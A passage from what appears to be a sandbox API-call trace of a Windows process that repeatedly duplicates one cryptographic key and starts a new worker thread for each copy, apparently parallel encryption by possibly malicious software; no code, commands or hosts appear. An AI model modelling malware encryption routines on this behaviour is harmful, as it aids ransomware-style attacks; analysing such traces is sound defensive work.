_Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x60dc60, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x3d0 [0143.328] SetThreadPriority (hThread=0x3d0, nPriority=0) returned 1 [0143.328] ResetEvent (hEvent=0x3cc) returned 1 [0143.328] ResumeThread (hThread=0x3d0) returned 0x1 [0143.328] Sleep (dwMilliseconds=0x0) [0143.329] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x609be4 | out: phKey=0x609be4*=0x8be278) returned 1 [0143.329] GetCurrentThreadId () returned 0x2ec [0143.329] calloc (_Count=0x1, _Size=0xb8) returned 0x60e020 [0143.329] GetCurrentThreadId () returned 0x2ec [0143.329] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3e0 [0143.329] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x60e020, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x3e4 [0143.330] SetThreadPriority (hThread=0x3e4, nPriority=0) returned 1 [0143.330] ResetEvent (hEvent=0x3e0) returned 1 [0143.330] ResumeThread (hThread=0x3e4) returned 0x1 [0143.330] Sleep (dwMilliseconds=0x0) [0143.331] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x609bc4 | out: phKey=0x609bc4*=0x8be738) returned 1 [0143.331] GetCurrentThreadId () returned 0x2ec [0143.331] calloc (_Count=0x1, _Size=0xb8) returned 0x60dd20 [0143.331] GetCurrentThreadId () returned 0x2ec [0143.331] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f4 [0143.331] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x60dd20, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x3f8 [0143.332] SetThreadPriority (hThread=0x3f8, nPriority=0) returned 1 [0143.332] ResetEvent (hEvent=0x3f4) returned 1 [0143.332] ResumeThread (hThread=0x3f8) returned 0x1 [0143.332] Sleep (dwMilliseconds=0x0) [0143.333] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x609c64 | out: phKey=0x609c64*=0x8be2f8) returned 1 [0143.333] GetCurrentThreadId () returned 0x2ec [0143.333] calloc (_Count=0x1, _Size=0xb8) returned 0x60dae0 [0143.333] GetCurrentThreadId () returned 0x2ec [0143.333] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x40c [0143.333] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x60dae0, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x410 [0143.333] SetThreadPriority (hThread=0x410, nPriority=0) returned 1 [0143.333] ResetEvent (hEvent=0x40c) returned 1 [0143.333] ResumeThread (hThread=0x410) returned 0x1 [0143.333] Sleep (dwMilliseconds=0x0) [0143.334] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x609b44 | out: phKey=0x609b44*=0x8be338) returned 1 [0143.335] GetCurrentThreadId () returned 0x2ec [0143.335] calloc (_Count=0x1, _Size=0xb8) returned 0x60df60 [0143.335] GetCurrentThreadId () returned 0x2ec [0143.335] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x420 [0143.335] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x60df60, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x424 [0143.336] SetThreadPriority (hThread=0x424, nPriority=0) returned 1 [0143.336] ResetEvent (hEvent=0x420) returned 1 [0143.336] ResumeThread (hThread=0x424) returned 0x1 [0143.336] Sleep (dwMilliseconds=0x0) [0143.337] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x609b64 | out: phKey=0x609b64*=0x8be3b8) returned 1 [0143.338] GetCurrentThreadId () returned 0x2ec [0143.338] calloc (_Count=0x1, _Size=0xb8) returned 0x28ae650 [0143.338] GetCurrentThreadId () returned 0x2ec [0143.338] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x434 [0143.338] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28ae650, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x438 [0143.338] SetThreadPriority (hThread=0x438, nPriority=0) returned 1 [0143.338] ResetEvent (hEvent=0x434) returned 1 [0143.338] ResumeThread (hThread=0x438) returned 0x1 [0143.338] Sleep (dwMilliseconds=0x0) [0143.339] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x609c84 | out: phKey=0x609c84*=0x8be3f8) returned 1 [0143.339] GetCurrentThreadId () returned 0x2ec [0143.339] calloc (_Count=0x1, _Size=0xb8) returned 0x28aee90 [0143.339] GetCurrentThreadId () returned 0x2ec [0143.339] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x448 [0143.340] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28aee90, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x44c [0143.340] SetThreadPriority (hThread=0x44c, nPriority=0) returned 1 [0143.340] ResetEvent (hEvent=0x448) returned 1 [0143.340] ResumeThread (hThread=0x44c) returned 0x1 [0143.340] Sleep (dwMilliseconds=0x0) [0143.341] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x609b74 | out: phKey=0x609b74*=0x8be238) returned 1 [0143.341] GetCurrentThreadId () returned 0x2ec [0143.341] calloc (_Count=0x1, _Size=0xb8) returned 0x28ae590 [0143.341] GetCurrentThreadId () returned 0x2ec [0143.341] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x45c [0143.341] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28ae590, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x460 [0143.342] SetThreadPriority (hThread=0x460, nPriority=0) returned 1 [0143.342] ResetEvent (hEvent=0x45c) returned 1 [0143.342] ResumeThread (hThread=0x460) returned 0x1 [0143.342] Sleep (dwMilliseconds=0x0) [0143.343] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x609b24 | out: phKey=0x609b24*=0x8bdcb8) returned 1 [0143.343] GetCurrentThreadId () returned 0x2ec [0143.343] calloc (_Count=0x1, _Size=0xb8) returned 0x28af0d0 [0143.343] GetCurrentThreadId () returned 0x2ec [0143.343] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x470 [0143.343] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28af0d0, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x474 [0143.344] SetThreadPriority (hThread=0x474, nPriority=0) returned 1 [0143.344] ResetEvent (hEvent=0x470) returned 1 [0143.344] ResumeThread (hThread=0x474) returned 0x1 [0143.344] Sleep (dwMilliseconds=0x0) [0143.345] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x609c94 | out: phKey=0x609c94*=0x8bdd78) returned 1 [0143.345] GetCurrentThreadId () returned 0x2ec [0143.345] calloc (_Count=0x1, _Size=0xb8) returned 0x28ae290 [0143.345] GetCurrentThreadId () returned 0x2ec [0143.345] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x484 [0143.345] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28ae290, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x488 [0143.346] SetThreadPriority (hThread=0x488, nPriority=0) returned 1 [0143.346] ResetEvent (hEvent=0x484) returned 1 [0143.346] ResumeThread (hThread=0x488) returned 0x1 [0143.346] Sleep (dwMilliseconds=0x0) [0143.351] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x609ca4 | out: phKey=0x609ca4*=0x8bddf8) returned 1 [0143.351] GetCurrentThreadId () returned 0x2ec [0143.351] calloc (_Count=0x1, _Size=0xb8) returned 0x28af250 [0143.351] GetCurrentThreadId () returned 0x2ec [0143.351] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x498 [0143.351] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28af250, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x49c [0143.351] SetThreadPriority (hThread=0x49c, nPriority=0) returned 1 [0143.351] ResetEvent (hEvent=0x498) returned 1 [0143.351] ResumeThread (hThread=0x49c) returned 0x1 [0143.351] Sleep (dwMilliseconds=0x0) [0143.353] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x609b84 | out: phKey=0x609b84*=0x8bdcf8) returned 1 [0143.353] GetCurrentThreadId () returned 0x2ec [0143.353] calloc (_Count=0x1, _Size=0xb8) returned 0x28ae710 [0143.353] GetCurrentThreadId () returned 0x2ec [0143.353] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4ac [0143.353] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28ae710, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x4b0 [0143.353] SetThreadPriority (hThread=0x4b0, nPriority=0) returned 1 [0143.353] ResetEvent (hEvent=0x4ac) returned 1 [0143.353] ResumeThread (hThread=0x4b0) returned 0x1 [0143.353] Sleep (dwMilliseconds=0x0) [0143.354] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x609c24 | out: phKey=0x609c24*=0x8bdef8) returned 1 [0143.354] GetCurrentThreadId () returned 0x2ec [0143.354] calloc (_Count=0x1, _Size=0xb8) returned 0x28aec50 [0143.354] GetCurrentThreadId () returned 0x2ec [0143.354] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4c0 [0143.354] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28aec50, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x4c4 [0143.355] SetThreadPriority (hThread=0x4c4, nPriority=0) returned 1 [0143.355] ResetEvent (hEvent=0x4c0) returned 1 [0143.355] ResumeThread (hThread=0x4c4) returned 0x1 [0143.355] Sleep (dwMilliseconds=0x0) [0143.356] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x609b94 | out: phKey=0x609b94*=0x8bde38) returned 1 [0143.356] GetCurrentThreadId () returned 0x2ec [0143.356] calloc (_Count=0x1, _Size=0xb8) returned 0x28af310 [0143.356] GetCurrentThreadId () returned 0x2ec [0143.356] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4d4 [0143.356] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28af310, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x4d8 [0143.356] SetThreadPriority (hThread=0x4d8, nPriority=0) returned 1 [0143.356] ResetEvent (hEvent=0x4d4) returned 1 [0143.357] ResumeThread (hThread=0x4d8) returned 0x1 [0143.357] Sleep (dwMilliseconds=0x0) [0143.359] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x609bb4 | out: phKey=0x609bb4*=0x8bdf38) returned 1 [0143.359] GetCurrentThreadId () returned 0x2ec [0143.359] calloc (_Count=0x1, _Size=0xb8) returned 0x28ae950 [0143.359] GetCurrentThreadId () returned 0x2ec [0143.359] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4e8 [0143.359] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28ae950, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x4ec [0143.360] SetThreadPriority (hThread=0x4ec, nPriority=0) returned 1 [0143.360] ResetEvent (hEvent=0x4e8) returned 1 [0143.360] ResumeThread (hThread=0x4ec) returned 0x1 [0143.360] Sleep (dwMilliseconds=0x0) [0143.389] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x609cb4 | out: phKey=0x609cb4*=0x8be8b8) returned 1 [0143.389] GetCurrentThreadId () returned 0x2ec [0143.389] calloc (_Count=0x1, _Size=0xb8) returned 0x28ae350 [0143.389] GetCurrentThreadId () returned 0x2ec [0143.389] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x284 [0143.389] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28ae350, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x288 [0143.390] SetThreadPriority (hThread=0x288, nPriority=0) returned 1 [0143.390] ResetEvent (hEvent=0x284) returned 1 [0143.390] ResumeThread (hThread=0x288) returned 0x1 [0143.390] Sleep (dwMilliseconds=0x0) [0143.391] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x609bd4 | out: phKey=0x609bd4*=0x8be578) returned 1 [0143.391] GetCurrentThreadId () returned 0x2ec [0143.391] calloc (_Count=0x1, _Size=0xb8) returned 0x28af3d0 [0143.391] GetCurrentThreadId () returned 0x2ec [0143.391] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x508 [0143.391] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28af3d0, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x50c [0143.392] SetThreadPriority (hThread=0x50c, nPriority=0) returned 1 [0143.392] ResetEvent (hEvent=0x508) returned 1 [0143.392] ResumeThread (hThread=0x50c) returned 0x1 [0143.392] Sleep (dwMilliseconds=0x0) [0143.393] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x609af4 | out: phKey=0x609af4*=0x8be478) returned 1 [0143.393] GetCurrentThreadId () returned 0x2ec [0143.393] calloc (_Count=0x1, _Size=0xb8) returned 0x28ae410 [0143.393] GetCurrentThreadId () returned 0x2ec [0143.393] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x51c [0143.393] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28ae410, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x520 [0143.394] SetThreadPriority (hThread=0x520, nPriority=0) returned 1 [0143.394] ResetEvent (hEvent=0x51c) returned 1 [0143.394] ResumeThread (hThread=0x520) returned 0x1 [0143.394] Sleep (dwMilliseconds=0x0) [0143.395] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x609b04 | out: phKey=0x609b04*=0x8be638) returned 1 [0143.395] GetCurrentThreadId () returned 0x2ec [0143.395] calloc (_Count=0x1, _Size=0xb8) returned 0x28adf90 [0143.395] GetCurrentThreadId () returned 0x2ec [0143.395] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x530 [0143.395] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28adf90, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x534 [0143.396] SetThreadPriority (hThread=0x534, nPriority=0) returned 1 [0143.396] ResetEvent (hEvent=0x530) returned 1 [0143.396] ResumeThread (hThread=0x534) returned 0x1 [0143.396] Sleep (dwMilliseconds=0x0) [0143.397] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x609bf4 | out: phKey=0x609bf4*=0x8bddb8) returned 1 [0143.397] GetCurrentThreadId () returned 0x2ec [0143.397] calloc (_Count=0x1, _Size=0xb8) returned 0x28ae050 [0143.397] GetCurrentThreadId () returned 0x2ec [0143.397] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x544 [0143.397] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28ae050, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x548 [0143.397] SetThreadPriority (hThread=0x548, nPriority=0) returned 1 [0143.397] ResetEvent (hEvent=0x544) returned 1 [0143.397] ResumeThread (hThread=0x548) returned 0x1 [0143.397] Sleep (dwMilliseconds=0x0) [0143.398] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x609c34 | out: phKey=0x609c34*=0x8bdb38) returned 1 [0143.399] GetCurrentThreadId () returned 0x2ec [0143.399] calloc (_Count=0x1, _Size=0xb8) returned 0x28ae4d0 [0143.399] GetCurrentThreadId () returned 0x2ec [0143.399] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x558 [0143.399] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28ae4d0, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x55c [0143.399] SetThreadPriority (hThread=0x55c, nPriority=0) returned 1 [0143.399] ResetEvent (hEvent=0x558) returned 1 [0143.399] ResumeThread (hThread=0x55c) returned 0x1 [0143.399] Sleep (dwMilliseconds=0x0) [0143.400] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x6075d4 | out: phKey=0x6075d4*=0x8bdeb8) returned 1 [0143.401] GetCurrentThreadId () returned 0x2ec [0143.401] calloc (_Count=0x1, _Size=0xb8) returned 0x28ae7d0 [0143.401] GetCurrentThreadId () returned 0x2ec [0143.401] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x56c [0143.401] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28ae7d0, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x570 [0143.401] SetThreadPriority (hThread=0x570, nPriority=0) returned 1 [0143.401] ResetEvent (hEvent=0x56c) returned 1 [0143.401] ResumeThread (hThread=0x570) returned 0x1 [0143.402] Sleep (dwMilliseconds=0x0) [0143.403] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x607784 | out: phKey=0x607784*=0x8bde78) returned 1 [0143.403] GetCurrentThreadId () returned 0x2ec [0143.403] calloc (_Count=0x1, _Size=0xb8) returned 0x28aeb90 [0143.403] GetCurrentThreadId () returned 0x2ec [0143.403] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x580 [0143.403] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28aeb90, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x584 [0143.416] SetThreadPriority (hThread=0x584, nPriority=0) returned 1 [0143.416] ResetEvent (hEvent=0x580) returned 1 [0143.416] ResumeThread (hThread=0x584) returned 0x1 [0143.416] Sleep (dwMilliseconds=0x0) [0143.420] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x607724 | out: phKey=0x607724*=0x8be178) returned 1 [0143.420] GetCurrentThreadId () returned 0x2ec [0143.420] calloc (_Count=0x1, _Size=0xb8) returned 0x28af490 [0143.420] GetCurrentThreadId () returned 0x2ec [0143.420] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x598 [0143.420] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28af490, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x59c [0143.421] SetThreadPriority (hThread=0x59c, nPriority=0) returned 1 [0143.421] ResetEvent (hEvent=0x598) returned 1 [0143.421] ResumeThread (hThread=0x59c) returned 0x1 [0143.421] Sleep (dwMilliseconds=0x0) [0143.481] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x607644 | out: phKey=0x607644*=0x8be138) returned 1 [0143.481] GetCurrentThreadId () returned 0x2ec [0143.481] calloc (_Count=0x1, _Size=0xb8) returned 0x28aef50 [0143.481] GetCurrentThreadId () returned 0x2ec [0143.481] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x5b0 [0143.481] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28aef50, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x5b4 [0143.482] SetThreadPriority (hThread=0x5b4, nPriority=0) returned 1 [0143.482] ResetEvent (hEvent=0x5b0) returned 1 [0143.482] ResumeThread (hThread=0x5b4) returned 0x1 [0143.482] Sleep (dwMilliseconds=0x0) [0143.484] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x607734 | out: phKey=0x607734*=0x8bdf78) returned 1 [0143.484] GetCurrentThreadId () returned 0x2ec [0143.484] calloc (_Count=0x1, _Size=0xb8) returned 0x28add50 [0143.484] GetCurrentThreadId () returned 0x2ec [0143.484] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x5c4 [0143.484] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28add50, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x5c8 [0143.484] SetThreadPriority (hThread=0x5c8, nPriority=0) returned 1 [0143.484] ResetEvent (hEvent=0x5c4) returned 1 [0143.484] ResumeThread (hThread=0x5c8) returned 0x1 [0143.484] Sleep (dwMilliseconds=0x0) [0143.486] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x607744 | out: phKey=0x607744*=0x8be1b8) returned 1 [0143.486] GetCurrentThreadId () returned 0x2ec [0143.486] calloc (_Count=0x1, _Size=0xb8) returned 0x28af190 [0143.486] GetCurrentThreadId () returned 0x2ec [0143.486] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x5d8 [0143.486] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28af190, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x5dc [0143.487] SetThreadPriority (hThread=0x5dc, nPriority=0) returned 1 [0143.487] ResetEvent (hEvent=0x5d8) returned 1 [0143.487] ResumeThread (hThread=0x5dc) returned 0x1 [0143.487] Sleep (dwMilliseconds=0x0) [0143.488] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x607754 | out: phKey=0x607754*=0x8bdc38) returned 1 [0143.488] GetCurrentThreadId () returned 0x2ec [0143.488] calloc (_Count=0x1, _Size=0xb8) returned 0x28ae890 [0143.488] GetCurrentThreadId () returned 0x2ec [0143.488] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x5ec [0143.488] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28ae890, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x5f0 [0143.489] SetThreadPriority (hThread=0x5f0, nPriority=0) returned 1 [0143.489] ResetEvent (hEvent=0x5ec) returned 1 [0143.489] ResumeThread (hThread=0x5f0) returned 0x1 [0143.489] Sleep (dwMilliseconds=0x0) [0143.491] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x607654 | out: phKey=0x607654*=0x8bdfb8) returned 1 [0143.491] GetCurrentThreadId () returned 0x2ec [0143.491] calloc (_Count=0x1, _Size=0xb8) returned 0x28aea10 [0143.491] GetCurrentThreadId () returned 0x2ec [0143.491] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x600 [0143.491] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28aea10, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x604 [0143.491] SetThreadPriority (hThread=0x604, nPriority=0) returned 1 [0143.491] ResetEvent (hEvent=0x600) returned 1 [0143.491] ResumeThread (hThread=0x604) returned 0x1 [0143.491] Sleep (dwMilliseconds=0x0) [0143.493] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x607794 | out: phKey=0x607794*=0x8be1f8) returned 1 [0143.493] GetCurrentThreadId () returned 0x2ec [0143.493] calloc (_Count=0x1, _Size=0xb8) returned 0x28ade10 [0143.493] GetCurrentThreadId () returned 0x2ec [0143.493] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x614 [0143.493] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28ade10, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x618 [0143.493] SetThreadPriority (hThread=0x618, nPriority=0) returned 1 [0143.493] ResetEvent (hEvent=0x614) returned 1 [0143.493] ResumeThread (hThread=0x618) returned 0x1 [0143.493] Sleep (dwMilliseconds=0x0) [0143.495] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x6075a4 | out: phKey=0x6075a4*=0x8bdff8) returned 1 [0143.495] GetCurrentThreadId () returned 0x2ec [0143.495] calloc (_Count=0x1, _Size=0xb8) returned 0x28aead0 [0143.495] GetCurrentThreadId () returned 0x2ec [0143.495] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x628 [0143.495] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28aead0, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x62c [0143.495] SetThreadPriority (hThread=0x62c, nPriority=0) returned 1 [0143.495] ResetEvent (hEvent=0x628) returned 1 [0143.495] ResumeThread (hThread=0x62c) returned 0x1 [0143.495] Sleep (dwMilliseconds=0x0) [0143.497] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x6075f4 | out: phKey=0x6075f4*=0x8be038) returned 1 [0143.497] GetCurrentThreadId () returned 0x2ec [0143.497] calloc (_Count=0x1, _Size=0xb8) returned 0x28aed10 [0143.497] GetCurrentThreadId () returned 0x2ec [0143.497] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x63c [0143.497] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28aed10, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x640 [0143.498] SetThreadPriority (hThread=0x640, nPriority=0) returned 1 [0143.498] ResetEvent (hEvent=0x63c) returned 1 [0143.498] ResumeThread (hThread=0x640) returned 0x1 [0143.498] Sleep (dwMilliseconds=0x0) [0143.499] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x607714 | out: phKey=0x607714*=0x8be078) returned 1 [0143.499] GetCurrentThreadId () returned 0x2ec [0143.499] calloc (_Count=0x1, _Size=0xb8) returned 0x28ae110 [0143.499] GetCurrentThreadId () returned 0x2ec [0143.499] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x650 [0143.499] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28ae110, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x654 [0143.499] SetThreadPriority (hThread=0x654, nPriority=0) returned 1 [0143.499] ResetEvent (hEvent=0x650) returned 1 [0143.500] ResumeThread (hThread=0x654) returned 0x1 [0143.500] Sleep (dwMilliseconds=0x0) [0143.501] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x6075b4 | out: phKey=0x6075b4*=0x8bda78) returned 1 [0143.501] GetCurrentThreadId () returned 0x2ec [0143.501] calloc (_Count=0x1, _Size=0xb8) returned 0x28af010 [0143.501] GetCurrentThreadId () returned 0x2ec [0143.501] CreateEventA 